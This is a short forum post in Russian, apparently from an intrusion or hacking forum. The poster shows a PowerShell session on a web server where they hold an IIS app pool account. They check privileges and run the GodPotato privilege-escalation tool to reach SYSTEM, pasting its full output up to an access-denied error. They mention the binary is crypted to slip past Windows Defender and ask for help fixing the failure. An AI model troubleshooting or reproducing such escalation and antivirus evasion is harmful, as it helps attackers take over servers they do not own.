Код:
PS C:\temp> whoami /priv
iis apppool\site.com
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\temp> ./GodPotato.exe -cmd "cmd /c whoami"
2024/06/03 17:46:23 Done
2024/06/03 17:46:23 Done
[*] CombaseModule: 0x140731431387136
[*] DispatchTable: 0x140731433693296
[*] UseProtseqFunction: 0x140731433069472
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\GodPotato\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000e802-ffff-ffff-7765-7dd88b905429
[*] DCOM obj OXID: 0x5e913da944b80fff
[*] DCOM obj OID: 0x9834259193e6999e
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 1336 Token:0x828 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[!] Cannot create process Win32Error:5
the MethodInfo::Invoke_3 method returned an error:
Access is denied.
SeImpersonatePrivilege имеется.
АВ в системе нет, только Windefender, файл криптованный.
В чем может быть проблема?
Последнее редактирование: